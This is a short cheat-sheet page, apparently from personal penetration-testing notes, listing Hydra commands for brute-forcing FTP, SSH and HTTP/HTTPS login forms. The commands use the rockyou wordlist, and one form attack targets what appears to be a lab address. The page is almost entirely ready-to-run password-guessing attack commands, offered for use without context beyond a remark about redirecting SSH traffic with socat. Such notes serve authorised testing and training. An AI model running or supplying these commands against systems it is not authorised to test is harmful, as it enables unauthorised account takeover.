Hydra 🐍

Brute force ftp

hydra -l user -P passwords.txt ftp://<target-ip>

Hydra for http form:

hydra -l fox -P /usr/share/wordlists/rockyou.txt -u -s 80 IP_HOST http-head
 
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
 
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"

Brute force ssh:

Use it when you can perform a redirection of the traffic to the ssh port but you have modified the configuration from the inside with socat

hydra -l USER -P /usr/share/wordlists/rockyou.txt ssh://IP_VICTIM:PORT

hydra -L USERFILE -P PASSWORDFILE DOMAIN/IP METHOD "REDIRECTIONURL:PARAMETERS:FAILMESSAGE:H=COOKIES"

💢c1b3r n0t3s

Explorer

Hydra 🐍

Brute force ftp

Hydra for http form:

Brute force ssh:

Graph View

Table of Contents

Backlinks

💢c1b3r n0t3s

Explorer

Hydra 🐍

Brute force ftp

Hydra for http form:

Brute force ssh:

Brute force login form:

Graph View

Table of Contents

Backlinks